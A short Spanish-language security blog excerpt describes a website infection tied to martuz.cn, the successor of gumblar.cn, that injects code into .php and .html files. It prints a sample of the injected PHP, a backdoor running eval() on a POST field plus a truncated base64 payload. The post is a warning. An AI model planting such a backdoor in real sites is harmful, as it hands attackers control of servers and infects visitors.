Recientemente muchos sitios web han sido infectados con un código malicioso alojado en el dominio martuz.cn (95 .129 .145 .58). Este script no es mas que la evolución del script conocido como gumblar.cn que ya no esta activo.
El script inyecta un código malicioso codificado en los archivos .php y .html de los sitios web infectados, sin embargo no altera el contenido del sitio web, ya que de lo que se trata es de llamar al verdadero archivo ejecutable que se encuentra alojado en el dominio martuz.cn de esta manera cuando el visitante desprevenido visita un sitio web infectado, ejecuta sin darse cuenta un script malicioso alojado en otro servidor. Debido a este comportamiento, los usuarios de firefox con NoScript son inmunes.
El código insertado es similar al siguiente:
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW.....
Leer el arículo completo